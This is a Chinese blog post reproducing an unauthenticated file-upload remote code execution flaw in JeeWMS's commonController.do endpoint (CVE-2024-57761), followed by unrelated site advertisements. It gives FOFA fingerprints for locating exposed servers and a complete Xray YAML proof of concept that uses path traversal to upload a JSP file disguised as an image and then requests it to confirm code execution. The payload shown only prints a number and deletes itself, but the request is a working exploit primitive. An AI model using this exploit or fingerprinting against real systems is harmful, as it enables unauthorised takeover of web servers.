JeeWMS commonController.do文件上传致RCE漏洞复现
参考链接:
https://axsec.blog.csdn.net/article/details/145476229
漏洞介绍:
JeeWMS commonController.do 接口存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
资产指纹:
body="url:userController.do?userOrgSelect&userId=" && "loginController.do?changeDefaultOrg"
Xray-poc:
name: poc-yaml-jeewms-commoncontroller-cve-2024-57761-fileupload transport: http set: randname: randomLowercase(4) randint: randomInt(10000000, 99999999) rboundary: randomLowercase(16) rules: r0: request: method: POST path: /rest/../commonController.do?parserXml follow_redirects: false headers: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}} body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randname}}.jsp\"\r\nContent-Type: image/png\r\n\r\n<% out.println(\"{{randint}}\");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>\r\n------WebKitFormBoundary{{rboundary}}--" expression: response.status == 200 && response.body_string.contains("success\":true") r1: request: method: GET path: /{{randname}}.jsp follow_redirects: false expression: >- response.status == 200 && response.body_string.contains(string(randint)) expression: r0() && r1() detail: author: Cysec links: - https://axsec.blog.csdn.net/article/details/145476229 fofakeyword: body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"或者fid="cC2r/XQpJXcYiYFHOc77bg==" description: JeeWMS commonController.do文件上传致RCE漏洞复现
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异
· 三行代码完成国际化适配,妙~啊~